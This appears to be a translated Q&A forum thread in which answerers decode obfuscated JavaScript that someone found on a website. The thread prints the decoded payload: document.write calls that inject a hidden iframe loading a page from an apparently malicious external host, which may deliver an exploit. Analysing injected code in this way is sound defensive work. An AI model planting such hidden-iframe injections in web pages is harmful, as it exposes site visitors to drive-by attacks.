【问题讨论】:
标签: javascript virus
一种病毒。我在数组文字中包含一些带有 Unicode 转义字符的字符串,第一个是一些 html,第二个是 "write"。然后,document[arr[1]](arr[0]) 被执行,转化为如下:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些 iframe 包含什么,可能会有一些漏洞利用。
此外,代码确实包含(在这两个 iframe 写入之间)一些函数(_1lO 和 O0l),这些函数可能会在 IlO 字符串变为 evaled 之前对其进行转义(是的,eval 是邪恶的! :-),但是你的 pastebin sn-p 前面有一些缺失的代码,所以我无法告诉你它们到底做了什么。你能给我们完整的剧本吗?
【讨论】:
这是一种经过混淆处理的病毒。所有这些东西的某个地方将是一个 eval()。如果你想知道它到底是做什么的,你必须解码这些部分并查看。
更有趣的是,这些东西是如何在你的代码中结束的。
【讨论】: